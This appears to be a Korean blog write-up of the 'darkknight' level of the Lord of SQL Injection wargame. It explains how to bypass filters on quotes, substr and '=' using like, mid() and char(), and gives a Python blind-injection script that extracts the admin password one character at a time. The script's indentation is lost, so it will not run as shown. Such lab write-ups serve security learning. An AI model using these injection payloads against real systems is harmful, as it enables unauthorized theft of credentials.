pw에서 '(%27)
no에서 '(%27), substr, 아스키코드와 =을 필터링했고
입력한 pw가 실제 admin의 pw와 일치해야 한다
Hint
=필터링 우회
substr 대처함수
id 대신 admin을 뽑아 올 수 있는 파라미터
아스키코드 사용 우회
...더보기
no 1은 guest이고
2가 admin인 것을 확인
admin의 pw가 8자리인 것을 확인
char함수 사용으로 아스키코드 우회
left 함수로 char를 사용해서 한글자씩 다오기 머리아파서
mid함수를 사용했다
substr과 똑같은 기능
import requests
url="https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?no="
cookie={"PHPSESSID":"qagfqnef3onon13vkcpmp4g8r3"}
session=requests.Session()
password=""
for i in range(1,9):
for j in range(48, 127):
payload=session.get(url+"0 or no like 2 and mid(pw,"+str(i)+",1) like char("+str(j)+")",cookies=cookie)
if("Hello admin" in payload.text):
print(chr(j)+"is correct!!!!!!!")
password += chr(j)
break
print(chr(j)+"is incorrect")
print(password)
'Wargame, CTF > LOS_eagle' 카테고리의 다른 글
LOS _giant (0) | 2019.11.07 |
---|---|
LOS _bugbear (0) | 2019.11.07 |
LOS_golem (0) | 2019.10.05 |
LOS _skeleton (0) | 2019.10.05 |
LOS _vampire (0) | 2019.10.05 |